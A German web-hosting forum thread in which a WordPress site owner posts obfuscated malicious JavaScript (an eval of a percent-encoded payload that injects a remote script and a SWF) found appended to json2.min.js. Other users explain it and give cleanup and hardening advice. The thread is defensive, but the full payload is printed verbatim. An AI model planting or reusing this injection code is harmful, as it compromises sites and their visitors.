Malware auf Wordpress Webseite
lima-city → Forum → Programmiersprachen → PHP, MySQL & .htaccess
abonnieren
beste wahl
code
date
datei
datenbank
desinfektion
ersten blick
folgendes gefunden code
ftp
gefahr
installation
manager
schaden
sog
spur
suche
url
ursache
version
-
Hallo,
Ich habe auf 2 meiner Webseiten (beides Wordpress Installationen) eine Malware Meldung von Google erhalten.
Ich habe mich sofort auf die Suche gemacht und habe folgendes gefunden:
eval(decodeURIComponent('%0D%0A%76%61%72%20%5F%5F%5F%73%63%73%63%73%63%20%3D%20%6E%75%6C%6C%3B%0D%0A%76%61%72%20%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%6E%75%6C%6C%3B%0D%0A%0D%0A%0D%0A%76%61%72%20%55%55%5F%44%79%6E%53%63%72%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%53%72%63%29%0D%0A%7B%0D%0A%09%76%61%72%20%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%20%73%2E%74%79%70%65%20%3D%20%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%20%73%2E%73%72%63%20%3D%20%70%53%72%63%3B%20%64%6F%63%75%6D%65%6E%74%2E%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%29%3B%20%72%65%74%75%72%6E%20%73%3B%0D%0A%7D%0D%0A%0D%0A%76%61%72%20%55%55%5F%53%69%6E%6B%53%68%69%74%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%50%65%74%75%73%68%6F%6B%29%0D%0A%7B%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%20%3D%20%55%55%5F%44%79%6E%53%63%72%28%27%68%74%74%70%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%73%77%66%6F%62%6A%65%63%74%2F%32%2E%32%2F%73%77%66%6F%62%6A%65%63%74%5F%73%72%63%2E%6A%73%27%29%3B%0D%0A%09%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%09%7B%0D%0A%09%09%69%66%20%28%20%21%5F%5F%5F%65%6D%65%6D%65%6D%20%29%0D%0A%09%09%7B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%64%69%76%27%29%3B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%2E%69%64%20%3D%20%27%66%72%66%72%66%72%5F%73%68%69%74%27%3B%0D%0A%09%09%09%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%5F%5F%5F%65%6D%65%6D%65%6D%29%3B%0D%0A%09%09%09%0D%0A%09%09%09%76%61%72%20%66%76%20%3D%20%7B%20%64%61%6C%69%6E%6B%3A%20%70%50%65%74%75%73%68%6F%6B%7D%3B%0D%0A%09%09%09%73%77%66%6F%62%6A%65%63%74%2E%65%6D%62%65%64%53%57%46%28%27%2E%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%2C%20%22%66%72%66%72%66%72%5F%73%68%69%74%22%2C%20%22%31%36%22%2C%20%22%31%36%22%2C%20%22%39%2E%30%2E%30%22%2C%20%66%61%6C%73%65%2C%20%66%76%29%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%0D%0A%0D%0A%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%0D%0A%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%0D%0A%73%63%72%69%70%74%2E%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%0D%0A%73%63%72%69%70%74%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61%64%73%2E%61%6B%65%65%6D%64%6F%6D%2E%63%6F%6D%2F%64%62%32%36%27%3B%0D%0A%73%63%72%69%70%74%2E%69%64%3D%27%79%6F%79%6F%79%6F%5F%73%68%69%74%27%3B%0D%0A%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A'));
Was bewirkt dieser Code? Welchen Schaden richtet er an? Wie verhindere ich das in Zukunft?
Freundliche Grüsse
ellogro2009 -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
Auf den ersten Blick sieht es so aus, daß dieser Code ein zusätzliches DIV auf deiner Seite einrichtet und dort Code von einer fremden Seite platziert.
Um zu beurteilen, welchen Schaden er anrichtet, müßte man genauer schauen. Fakt ist, das gehört nicht auf die Seite und sollte schleunigst beseitigt werden.
Wo hast Du diesen Code gefunden?
Benutzt Du eine aktuelle Version von Wordpress?
Sind die Plugins alle aktuell?
Kommt das verwendete Template aus einer zuverlässigen Quelle?
Maßnahmen:
a) Die Seite vom Netz nehmen. Nicht löschen! Beste Wahl wäre, den Homeordner umzubenennen.
b) Passwörter von FTP und Datenbank ändern
c) Backup von Datenbank und Webspace anlegen
d) Suche nach Ursachen
e) Desinfektion der Installation -
Bei Wordpress war ja wie bei Drupal eine gravierende Sicherheitslücke gefunden worden, bei WP betrifft es alle Versionen von 3.0 - 3.9.2.. d.H. wenn man nicht regelmässig seine Installation updatet läuft man relativ einfach Gefahr so kompromittiert zu werden.
https://wordpress.org/news/2014/11/wordpress-4-0-1/
Beitrag zuletzt geändert: 27.12.2014 19:40:23 von c22 -
Bei beiden Seiten handelt es sich um Wordpress 3.9.x die ich sofort geupdatet habe ohne genau auf die Version zu schauen. Beim Template handelt es sich um ein Original von Wordpress (Twenty Twelve 1.5) dies habe ich eben gleich auf 1.6 aktualisiert.
Der Schadcode befand sich unter httpdocs/wp-includes/js/json2.min.js am Ende der Datei (https://www.dropbox.com/s/pmg0666ilh32zkw/Screenshot%202014-12-27%2019.49.19.png?dl=0)
Plugins:
https://www.dropbox.com/s/i695ea1l3t4nnrg/Screenshot%202014-12-27%2019.44.15.png?dl=0
Bei der anderen Seite selbes Schadensbild jedoch etwas andere Plugins, ich gehe jedoch von der selben Methode aus.
Wie wird dieser Code implementiert? Durch falsche Dateiberechtigung oder via FTP?
Freundliche Grüsse
ellogro2009 -
Hallo ellogro2009,
solche Skripte stammen meistens von unsauberen Plugins, sog. "nulled scripts". In diesem Fall scheint es sich aber um eine bekannte Sicherheitslücke des Plugins "Download Manager" zu handeln.
Siehe: WordPress Security: Serious Vulnerability in WordPress Download Manager
Ich kann Dir nur raten Wordfence zu installieren und zu nutzen, denn es warn Dich vor dubiosen Änderungen an Dateien und sagt Dir auch was genau geändert wurde. So kommst Du zukünftig Schadcode schneller und leichter auf die Spur. Ach und den Newsletter von Wordfence würde ich auch gleich abonnieren - es lohnt sich up to date zu sein!
Gruß,
webdesignerin -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage